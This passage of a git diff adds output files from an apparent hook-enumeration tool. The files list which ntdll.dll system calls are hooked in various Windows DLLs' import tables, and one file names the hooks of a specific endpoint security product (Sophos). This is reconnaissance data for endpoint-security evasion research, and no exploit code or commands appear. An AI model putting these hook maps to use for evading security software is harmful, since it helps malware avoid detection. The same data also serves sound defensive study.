+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryMultipleValueKey is hooked to 0x00007ff9e132fa60
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenPrivateNamespace is hooked to 0x00007ff9e132f4c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeletePrivateNamespace is hooked to 0x00007ff9e132ea80
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreatePrivateNamespace is hooked to 0x00007ff9e132e6e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtDuplicateObject is hooked to 0x00007ff9e132d750
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtResetEvent is hooked to 0x00007ff9e132ff00
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryEvent is hooked to 0x00007ff9e132da90
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetInformationProcess is hooked to 0x00007ff9e132d350
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtLoadKeyEx is hooked to 0x00007ff9e132f100
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenProcessTokenEx is hooked to 0x00007ff9e132d5d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateWnfStateName is hooked to 0x00007ff9e132e940
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteWnfStateName is hooked to 0x00007ff9e132eae0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSecurityObject is hooked to 0x00007ff9e13304e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtUnmapViewOfSection is hooked to 0x00007ff9e132d510
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySecurityAttributesToken is hooked to 0x00007ff9e132fb20
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetCachedSigningLevel is hooked to 0x00007ff9e132ede0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtYieldExecution is hooked to 0x00007ff9e132d890
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateLocallyUniqueId is hooked to 0x00007ff9e132dde0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheck is hooked to 0x00007ff9e132cfd0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByType is hooked to 0x00007ff9e132dc20
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultList is hooked to 0x00007ff9e132dc40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationToken is hooked to 0x00007ff9e1330360
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAdjustPrivilegesToken is hooked to 0x00007ff9e132d7f0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAdjustGroupsToken is hooked to 0x00007ff9e132dd40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegeCheck is hooked to 0x00007ff9e132f6c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckAndAuditAlarm is hooked to 0x00007ff9e132d4f0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeAndAuditAlarm is hooked to 0x00007ff9e132daf0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultListAndAuditAlarm is hooked to 0x00007ff9e132dc60
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultListAndAuditAlarmByHandle is hooked to 0x00007ff9e132dc80
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenObjectAuditAlarm is hooked to 0x00007ff9e132f480
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegeObjectAuditAlarm is hooked to 0x00007ff9e132f6e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCloseObjectAuditAlarm is hooked to 0x00007ff9e132d730
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteObjectAuditAlarm is hooked to 0x00007ff9e132ea60
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegedServiceAuditAlarm is hooked to 0x00007ff9e132f700
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtImpersonateAnonymousToken is hooked to 0x00007ff9e132ef60
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtFilterToken is hooked to 0x00007ff9e132ec60
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetCachedSigningLevel is hooked to 0x00007ff9e1330120
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtLockVirtualMemory is hooked to 0x00007ff9e132f180
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtUnlockVirtualMemory is hooked to 0x00007ff9e1330960
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtReadVirtualMemory is hooked to 0x00007ff9e132d7b0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtProtectVirtualMemory is hooked to 0x00007ff9e132d9d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtWriteVirtualMemory is hooked to 0x00007ff9e132d710
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateVirtualMemory is hooked to 0x00007ff9e132d2d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateVirtualMemoryEx is hooked to 0x00007ff9e132de80
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtFreeVirtualMemory is hooked to 0x00007ff9e132d390
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenEvent is hooked to 0x00007ff9e132d7d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetWriteWatch is hooked to 0x00007ff9e132ef40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtResetWriteWatch is hooked to 0x00007ff9e132ff20
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationVirtualMemory is hooked to 0x00007ff9e13303c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateUserPhysicalPages is hooked to 0x00007ff9e132de20
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtFreeUserPhysicalPages is hooked to 0x00007ff9e132ed80
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtMapUserPhysicalPages is hooked to 0x00007ff9e132f240
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenDirectoryObject is hooked to 0x00007ff9e132dad0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSymbolicLinkObject is hooked to 0x00007ff9e132e7e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateDirectoryObjectEx is hooked to 0x00007ff9e132e4c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtLoadEnclaveData is hooked to 0x00007ff9e132f0a0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtTerminateEnclave is hooked to 0x00007ff9e13307c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateNamedPipeFile is hooked to 0x00007ff9e132e660
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtLockFile is hooked to 0x00007ff9e132f120
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtUnlockFile is hooked to 0x00007ff9e1330940
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelIoFile is hooked to 0x00007ff9e132db60
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelIoFileEx is hooked to 0x00007ff9e132e200
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelSynchronousIoFile is hooked to 0x00007ff9e132e220
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtReadFileScatter is hooked to 0x00007ff9e132d590
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtWriteFileGather is hooked to 0x00007ff9e132d330
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetEvent is hooked to 0x00007ff9e132d190
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtClearEvent is hooked to 0x00007ff9e132d790
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtPulseEvent is hooked to 0x00007ff9e132f780
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSemaphore is hooked to 0x00007ff9e132e7c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenSemaphore is hooked to 0x00007ff9e132f540
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtReleaseSemaphore is hooked to 0x00007ff9e132d110
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateMutant is hooked to 0x00007ff9e132e640
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateTimer2 is hooked to 0x00007ff9e132e840
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateTimer is hooked to 0x00007ff9e132e820
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenTimer is hooked to 0x00007ff9e132f5c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetTimerEx is hooked to 0x00007ff9e13305e0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelTimer is hooked to 0x00007ff9e132dbe0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSignalAndWaitForSingleObject is hooked to 0x00007ff9e13306c0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtDelayExecution is hooked to 0x00007ff9e132d650
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtOpenProcess is hooked to 0x00007ff9e132d490
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtCompareObjects is hooked to 0x00007ff9e132e320
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationObject is hooked to 0x00007ff9e132db40
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSystemTime is hooked to 0x00007ff9e1330580
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryAuxiliaryCounterFrequency is hooked to 0x00007ff9e132f7a0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtConvertBetweenAuxiliaryCounterAndPerformanceCounter is hooked to 0x00007ff9e132e400
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtCreateThreadEx is hooked to 0x00007ff9e132e800
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtResumeThread is hooked to 0x00007ff9e132da10
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtTerminateThread is hooked to 0x00007ff9e132da30
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenThread is hooked to 0x00007ff9e132f5a0
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtSuspendThread is hooked to 0x00007ff9e1330780
+  |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetContextThread is hooked to 0x00007ff9e132ee20
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetContextThread is hooked to 0x00007ff9e1330160
+  |-- KERNELBASE.dll IAT to ntdll.dll of function *NtQueueApcThreadEx2 is hooked to 0x00007ff9e132fca0
+  +-- 147 hooked functions.
+
+Checking ntdll.dll at InProcessClient64.dll IAT
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtOpenSection is hooked to 0x00007ff9e132d6b0
+  |-- InProcessClient64.dll IAT to ntdll.dll of function *NtQueueApcThread is hooked to 0x00007ff9e132d870
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtQuerySection is hooked to 0x00007ff9e132d9f0
+  |-- InProcessClient64.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtCallbackReturn is hooked to 0x00007ff9e132d070
+  |-- InProcessClient64.dll IAT to ntdll.dll of function NtGetNextThread is hooked to 0x00007ff9e132eee0
+  +-- 12 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetInformationToken is hooked to 0x00007ff9e1330360
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtCompareTokens is hooked to 0x00007ff9e132e360
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtDeleteKey is hooked to 0x00007ff9e132ea40
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenSymbolicLinkObject is hooked to 0x00007ff9e132f580
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQuerySymbolicLinkObject is hooked to 0x00007ff9e132fba0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtTraceControl is hooked to 0x00007ff9e1330860
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtRenameKey is hooked to 0x00007ff9e132fe40
+  |-- ADVAPI32.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+  |-- ADVAPI32.dll IAT to ntdll.dll of function *NtQuerySystemTime is hooked to 0x00007ff9e132db10
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryPerformanceCounter is hooked to 0x00007ff9e132d5f0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateMutant is hooked to 0x00007ff9e132e640
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenPrivateNamespace is hooked to 0x00007ff9e132f4c0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreatePrivateNamespace is hooked to 0x00007ff9e132e6e0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtAlpcQueryInformation is hooked to 0x00007ff9e132e0e0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryMutant is hooked to 0x00007ff9e132fa80
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtReplaceKey is hooked to 0x00007ff9e132fe80
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtSaveKey is hooked to 0x00007ff9e1330040
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtSaveMergedKeys is hooked to 0x00007ff9e1330080
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenKeyEx is hooked to 0x00007ff9e132f3e0
+  |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetInformationKey is hooked to 0x00007ff9e1330300
+  +-- 46 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+  +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+  |-- sechost.dll IAT to ntdll.dll of function NtOpenProcessTokenEx is hooked to 0x00007ff9e132d5d0
+  |-- sechost.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+  |-- sechost.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+  |-- sechost.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+  |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+  |-- sechost.dll IAT to ntdll.dll of function *NtQueueApcThread is hooked to 0x00007ff9e132d870
+  |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+  |-- sechost.dll IAT to ntdll.dll of function NtCancelIoFile is hooked to 0x00007ff9e132db60
+  |-- sechost.dll IAT to ntdll.dll of function NtTraceControl is hooked to 0x00007ff9e1330860
+  |-- sechost.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+  |-- sechost.dll IAT to ntdll.dll of function NtSetIntervalProfile is hooked to 0x00007ff9e1330400
+  |-- sechost.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+  |-- sechost.dll IAT to ntdll.dll of function NtQueryIntervalProfile is hooked to 0x00007ff9e132fa00
+  |-- sechost.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+  |-- sechost.dll IAT to ntdll.dll of function NtQueryPerformanceCounter is hooked to 0x00007ff9e132d5f0
+  |-- sechost.dll IAT to ntdll.dll of function NtSetEvent is hooked to 0x00007ff9e132d190
+  |-- sechost.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+  |-- sechost.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+  |-- sechost.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+  |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+  |-- sechost.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+  +-- 21 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtWaitForAlertByThreadId is hooked to 0x00007ff9e1330a00
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlertThreadByThreadId is hooked to 0x00007ff9e132ddc0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAllocateUuids is hooked to 0x00007ff9e132de60
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAdjustPrivilegesToken is hooked to 0x00007ff9e132d7f0
+  |-- RPCRT4.dll IAT to ntdll.dll of function *NtQuerySystemTime is hooked to 0x00007ff9e132db10
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtPrivilegeCheck is hooked to 0x00007ff9e132f6c0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateResourceReserve is hooked to 0x00007ff9e132df60
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCancelMessage is hooked to 0x00007ff9e132dec0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeleteSecurityContext is hooked to 0x00007ff9e132e020
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateSecurityContext is hooked to 0x00007ff9e132dfa0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcConnectPortEx is hooked to 0x00007ff9e132df00
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcConnectPort is hooked to 0x00007ff9e132dee0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtImpersonateAnonymousToken is hooked to 0x00007ff9e132ef60
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateSectionView is hooked to 0x00007ff9e132df80
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreatePortSection is hooked to 0x00007ff9e132df40
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAllocateReserveObject is hooked to 0x00007ff9e132de00
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtSetIoCompletionEx is hooked to 0x00007ff9e1330440
+  |-- RPCRT4.dll IAT to ntdll.dll of function *NtQueueApcThreadEx is hooked to 0x00007ff9e132fc80
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtDeleteWnfStateName is hooked to 0x00007ff9e132eae0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateWnfStateName is hooked to 0x00007ff9e132e940
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenDirectoryObject is hooked to 0x00007ff9e132dad0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtDelayExecution is hooked to 0x00007ff9e132d650
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreatePort is hooked to 0x00007ff9e132df20
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcQueryInformation is hooked to 0x00007ff9e132e0e0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcSendWaitReceivePort is hooked to 0x00007ff9e132e140
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcAcceptConnectPort is hooked to 0x00007ff9e132dea0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeletePortSection is hooked to 0x00007ff9e132dfc0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeleteSectionView is hooked to 0x00007ff9e132e000
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDisconnectPort is hooked to 0x00007ff9e132e040
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcQueryInformationMessage is hooked to 0x00007ff9e132e100
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateNamedPipeFile is hooked to 0x00007ff9e132e660
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcSetInformation is hooked to 0x00007ff9e132e160
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+  |-- RPCRT4.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+  |-- RPCRT4.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcOpenSenderThread is hooked to 0x00007ff9e132e0c0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcOpenSenderProcess is hooked to 0x00007ff9e132e0a0
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcImpersonateClientContainerOfPort is hooked to 0x00007ff9e132e060
+  |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcImpersonateClientOfPort is hooked to 0x00007ff9e132e080
+  +-- 53 hooked functions.
+
+Checking ntdll.dll at bcrypt.dll IAT
+  |-- bcrypt.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+  |-- bcrypt.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+  |-- bcrypt.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+  |-- bcrypt.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+  |-- bcrypt.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+  |-- bcrypt.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+  |-- bcrypt.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+  +-- 7 hooked functions.
+
+Checking ntdll.dll at FLTLIB.DLL IAT
+  |-- FLTLIB.DLL IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+  |-- FLTLIB.DLL IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+  |-- FLTLIB.DLL IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+  |-- FLTLIB.DLL IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+  +-- 4 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/sophos.txt b/enum/results_enum/sophos.txt
new file mode 100644
index 0000000..437c490
--- /dev/null
+++ b/enum/results_enum/sophos.txt
@@ -0,0 +1,44 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAllocateVirtualMemory is hooked
+NtAlpcConnectPort is hooked
+NtCreateProcessEx is hooked
+NtFreeVirtualMemory is hooked
+NtMapViewOfSection is hooked
+NtProtectVirtualMemory is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtSetContextThread is hooked
+NtUnmapViewOfSection is hooked
